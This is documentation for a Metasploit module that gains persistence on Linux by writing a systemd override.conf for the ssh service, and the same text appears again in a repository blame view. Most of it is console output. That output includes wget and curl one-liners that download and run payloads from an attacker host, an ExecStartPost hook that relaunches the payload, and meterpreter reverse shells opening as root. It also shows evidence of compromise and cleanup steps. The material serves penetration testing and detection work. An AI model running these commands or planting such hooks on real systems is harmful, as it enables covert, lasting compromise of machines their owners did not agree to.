documentation/modules/exploit/linux/persistence/init_systemd_override.md

## Vulnerable Application

This module will create an override.conf file for a SystemD service on the box.
The ExecStartPost hook is used to launch the payload after the service is started.
We need enough access (typically root) to write in the /etc/systemd/system
directory and potentially restart services.

Verified on Ubuntu 22.04


## Verification Steps

1. Exploit a box and get a shell
2. `use exploit/linux/persistence/init_systemd_override`
3. `set SESSION <id>`
4. `exploit`

## Options

### SERVICE

Which service to override. Defaults to `ssh`.

### ReloadService

If set to `true` (default), runs `systemctl restart` to restart the service.

## Scenarios

### Ubuntu 22.04

Initial (root) access

```
[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4446 
[*] Using URL: http://1.1.1.1:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO 1k6smMWF --no-check-certificate http://1.1.1.1:8082/l; chmod +x 1k6smMWF; ./1k6smMWF& disown
msf exploit(multi/script/web_delivery) > 
[*] 2.2.2.2     web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 2.2.2.2:42996) at 2025-09-11 17:18:18 -0400

msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 2.2.2.2
OS           : Ubuntu 22.04 (Linux 5.15.0-48-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > background
[*] Backgrounding session 1...
```

Persistence (utilizing a manual restart)

```
msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/init_systemd_override 
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/persistence/init_systemd_override) > set session 1
session => 1
msf exploit(linux/persistence/init_systemd_override) > set ReloadService false
ReloadService => false
msf exploit(linux/persistence/init_systemd_override) > exploit
[*] Command to run on remote host: curl -so ./vYKBsdwwFTy http://1.1.1.1:8080/t70WmtC4mNeBieRpZqn09Q;chmod +x ./vYKBsdwwFTy;./vYKBsdwwFTy&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /t70WmtC4mNeBieRpZqn09Q
[*] Started reverse TCP handler on 1.1.1.1:4444 
msf exploit(linux/persistence/init_systemd_override) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /tmp/ is writable and system is systemd based
[!] Payloads in /tmp will only last until reboot, you want to choose elsewhere.
[*] Creating /etc/systemd/system/ssh.service.d
[*] Writing override file to: /etc/systemd/system/ssh.service.d/override.conf
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/2.2.2.2_20250911.1859/2.2.2.2_20250911.1859.rc

msf exploit(linux/persistence/init_systemd_override) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2862 created.
Channel 6 created.
systemctl restart ssh
[*] Client 2.2.2.2 requested /t70WmtC4mNeBieRpZqn09Q
[*] Sending payload to 2.2.2.2 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:54688) at 2025-09-11 17:19:27 -0400

```

Evidence of compromise in systemctl

```
systemctl status ssh
* ssh.service - OpenBSD Secure Shell server
     Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: enabled)
    Drop-In: /etc/systemd/system/ssh.service.d
             `-override.conf
     Active: active (running) since Thu 2025-09-11 21:19:26 UTC; 15s ago
       Docs: man:sshd(8)
             man:sshd_config(5)
    Process: 2864 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)
    Process: 2867 ExecStartPost=/bin/sh -c curl -so ./vYKBsdwwFTy http://1.1.1.1:8080/t70WmtC4mNeBieRpZqn09Q;chmod +x ./vYKBsdwwFTy;./vYKBsdwwFTy& (code=exited, status=0/SUCCESS)
   Main PID: 2866 (sshd)
      Tasks: 2 (limit: 3444)
     Memory: 5.7M
        CPU: 125ms
     CGroup: /system.slice/ssh.service
             |-2866 "sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups"
             `-2870 ./vYKBsdwwFTy

Sep 11 21:19:26 ubuntu2204 systemd[1]: Starting OpenBSD Secure Shell server...
Sep 11 21:19:26 ubuntu2204 sshd[2866]: Server listening on 0.0.0.0 port 22.
Sep 11 21:19:26 ubuntu2204 sshd[2866]: Server listening on :: port 22.
Sep 11 21:19:26 ubuntu2204 systemd[1]: Started OpenBSD Secure Shell server.
```

Cleanup

```
meterpreter > run /root/.msf4/logs/persistence/2.2.2.2_20250911.1859/2.2.2.2_20250911.1859.rc
[*] Processing /root/.msf4/logs/persistence/2.2.2.2_20250911.1859/2.2.2.2_20250911.1859.rc for ERB directives.
resource (/root/.msf4/logs/persistence/2.2.2.2_20250911.1859/2.2.2.2_20250911.1859.rc)> rm /etc/systemd/system/ssh.service.d/override.conf
resource (/root/.msf4/logs/persistence/2.2.2.2_20250911.1859/2.2.2.2_20250911.1859.rc)> execute -f /bin/systemctl -a "daemon-reload"
Process 2914 created.
resource (/root/.msf4/logs/persistence/2.2.2.2_20250911.1859/2.2.2.2_20250911.1859.rc)> execute -f /bin/systemctl -a "restart ssh.service"
Process 2915 created.
```
systemd service override persistence 2025-09-11 17:29:13 -04:00			`## Vulnerable Application`

			`This module will create an override.conf file for a SystemD service on the box.`
			`The ExecStartPost hook is used to launch the payload after the service is started.`
			`We need enough access (typically root) to write in the /etc/systemd/system`
			`directory and potentially restart services.`

			`Verified on Ubuntu 22.04`


			`## Verification Steps`

			`1. Exploit a box and get a shell`
			2. `use exploit/linux/persistence/init_systemd_override`
			3. `set SESSION <id>`
			4. `exploit`

			`## Options`

			`### SERVICE`

			Which service to override. Defaults to `ssh`.

			`### ReloadService`

			If set to `true` (default), runs `systemctl restart` to restart the service.

			`## Scenarios`

			`### Ubuntu 22.04`

			`Initial (root) access`

			```
			`[*] Processing /root/.msf4/msfconsole.rc for ERB directives.`
			`resource (/root/.msf4/msfconsole.rc)> setg verbose true`
			`verbose => true`
			`resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1`
			`lhost => 1.1.1.1`
			`resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp`
			`payload => cmd/linux/http/x64/meterpreter/reverse_tcp`
			`resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery`
			`[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp`
			`resource (/root/.msf4/msfconsole.rc)> set target 7`
			`target => 7`
			`resource (/root/.msf4/msfconsole.rc)> set srvport 8082`
			`srvport => 8082`
			`resource (/root/.msf4/msfconsole.rc)> set uripath l`
			`uripath => l`
			`resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp`
			`payload => linux/x64/meterpreter/reverse_tcp`
			`resource (/root/.msf4/msfconsole.rc)> set lport 4446`
			`lport => 4446`
			`resource (/root/.msf4/msfconsole.rc)> run`
			`[*] Exploit running as background job 0.`
			`[*] Exploit completed, but no session was created.`
			`[*] Started reverse TCP handler on 1.1.1.1:4446`
			`[*] Using URL: http://1.1.1.1:8082/l`
			`[*] Server started.`
			`[*] Run the following command on the target machine:`
			`wget -qO 1k6smMWF --no-check-certificate http://1.1.1.1:8082/l; chmod +x 1k6smMWF; ./1k6smMWF& disown`
			`msf exploit(multi/script/web_delivery) >`
			`[*] 2.2.2.2 web_delivery - Delivering Payload (250 bytes)`
			`[*] Transmitting intermediate stager...(126 bytes)`
			`[*] Sending stage (3090404 bytes) to 2.2.2.2`
			`[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 2.2.2.2:42996) at 2025-09-11 17:18:18 -0400`

			`msf exploit(multi/script/web_delivery) > sessions -i 1`
			`[*] Starting interaction with 1...`

			`meterpreter > sysinfo`
			`Computer : 2.2.2.2`
			`OS : Ubuntu 22.04 (Linux 5.15.0-48-generic)`
			`Architecture : x64`
			`BuildTuple : x86_64-linux-musl`
			`Meterpreter : x64/linux`
			`meterpreter > getuid`
			`Server username: root`
			`meterpreter > background`
			`[*] Backgrounding session 1...`
			```

Update documentation/modules/exploit/linux/persistence/init_systemd_override.md 2025-09-18 16:25:54 -04:00			`Persistence (utilizing a manual restart)`
systemd service override persistence 2025-09-11 17:29:13 -04:00
			```
			`msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/init_systemd_override`
			`[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp`
			`msf exploit(linux/persistence/init_systemd_override) > set session 1`
			`session => 1`
			`msf exploit(linux/persistence/init_systemd_override) > set ReloadService false`
			`ReloadService => false`
			`msf exploit(linux/persistence/init_systemd_override) > exploit`
			`[*] Command to run on remote host: curl -so ./vYKBsdwwFTy http://1.1.1.1:8080/t70WmtC4mNeBieRpZqn09Q;chmod +x ./vYKBsdwwFTy;./vYKBsdwwFTy&`
			`[*] Exploit running as background job 1.`
			`[*] Exploit completed, but no session was created.`

			`[*] Fetch handler listening on 1.1.1.1:8080`
			`[*] HTTP server started`
			`[*] Adding resource /t70WmtC4mNeBieRpZqn09Q`
			`[*] Started reverse TCP handler on 1.1.1.1:4444`
			`msf exploit(linux/persistence/init_systemd_override) > [*] Running automatic check ("set AutoCheck false" to disable)`
			`[+] The target appears to be vulnerable. /tmp/ is writable and system is systemd based`
			`[!] Payloads in /tmp will only last until reboot, you want to choose elsewhere.`
			`[*] Creating /etc/systemd/system/ssh.service.d`
			`[*] Writing override file to: /etc/systemd/system/ssh.service.d/override.conf`
			`[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/2.2.2.2_20250911.1859/2.2.2.2_20250911.1859.rc`

			`msf exploit(linux/persistence/init_systemd_override) > sessions -i 1`
			`[*] Starting interaction with 1...`

			`meterpreter > shell`
			`Process 2862 created.`
			`Channel 6 created.`
			`systemctl restart ssh`
			`[*] Client 2.2.2.2 requested /t70WmtC4mNeBieRpZqn09Q`
			`[*] Sending payload to 2.2.2.2 (curl/7.81.0)`
			`[*] Transmitting intermediate stager...(126 bytes)`
			`[*] Sending stage (3090404 bytes) to 2.2.2.2`
			`[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:54688) at 2025-09-11 17:19:27 -0400`

			```

			`Evidence of compromise in systemctl`

			```
			`systemctl status ssh`
			`* ssh.service - OpenBSD Secure Shell server`
			`Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: enabled)`
			`Drop-In: /etc/systemd/system/ssh.service.d`
			`-override.conf
			`Active: active (running) since Thu 2025-09-11 21:19:26 UTC; 15s ago`
			`Docs: man:sshd(8)`
			`man:sshd_config(5)`
			`Process: 2864 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)`
			`Process: 2867 ExecStartPost=/bin/sh -c curl -so ./vYKBsdwwFTy http://1.1.1.1:8080/t70WmtC4mNeBieRpZqn09Q;chmod +x ./vYKBsdwwFTy;./vYKBsdwwFTy& (code=exited, status=0/SUCCESS)`
			`Main PID: 2866 (sshd)`
			`Tasks: 2 (limit: 3444)`
			`Memory: 5.7M`
			`CPU: 125ms`
			`CGroup: /system.slice/ssh.service`
			`\|-2866 "sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups"`
			`-2870 ./vYKBsdwwFTy

			`Sep 11 21:19:26 ubuntu2204 systemd[1]: Starting OpenBSD Secure Shell server...`
			`Sep 11 21:19:26 ubuntu2204 sshd[2866]: Server listening on 0.0.0.0 port 22.`
			`Sep 11 21:19:26 ubuntu2204 sshd[2866]: Server listening on :: port 22.`
			`Sep 11 21:19:26 ubuntu2204 systemd[1]: Started OpenBSD Secure Shell server.`
			```

			`Cleanup`

			```
			`meterpreter > run /root/.msf4/logs/persistence/2.2.2.2_20250911.1859/2.2.2.2_20250911.1859.rc`
			`[*] Processing /root/.msf4/logs/persistence/2.2.2.2_20250911.1859/2.2.2.2_20250911.1859.rc for ERB directives.`
			`resource (/root/.msf4/logs/persistence/2.2.2.2_20250911.1859/2.2.2.2_20250911.1859.rc)> rm /etc/systemd/system/ssh.service.d/override.conf`
			`resource (/root/.msf4/logs/persistence/2.2.2.2_20250911.1859/2.2.2.2_20250911.1859.rc)> execute -f /bin/systemctl -a "daemon-reload"`
			`Process 2914 created.`
			`resource (/root/.msf4/logs/persistence/2.2.2.2_20250911.1859/2.2.2.2_20250911.1859.rc)> execute -f /bin/systemctl -a "restart ssh.service"`
			`Process 2915 created.`
			```